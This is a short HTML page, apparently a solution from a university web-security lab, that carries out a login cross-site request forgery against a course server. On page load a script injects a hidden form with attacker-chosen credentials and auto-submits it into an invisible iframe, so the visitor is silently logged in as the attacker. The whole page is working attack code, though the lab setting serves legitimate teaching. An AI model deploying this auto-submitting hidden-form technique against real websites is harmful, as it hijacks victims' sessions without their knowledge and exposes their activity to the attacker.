<!DOCTYPE html>
<html lang="en">
<head>
    <title>2.2.2.1</title>
    <meta charset="UTF-8">
</head>

<body onload="evilAction();">

<script>
    function evilAction() {
        document.body.innerHTML
            += '<form id="evilForm" method="POST" target="YouCannotSeeMe"' +
            ' action="http://bungle-cs461.csl.illinois.edu/login?csrfdefense=0&xssdefense=5">' +
            '<input type="hidden" id="username" name="username" value="attacker"/>' +
            '<input type="hidden" id="userpass" name="password" value="l33th4x"/>' +
            '</form>' +
            '<iframe name="YouCannotSeeMe" hidden></iframe>';

        document.forms["evilForm"].submit();
    }
</script>

</body>
</html>
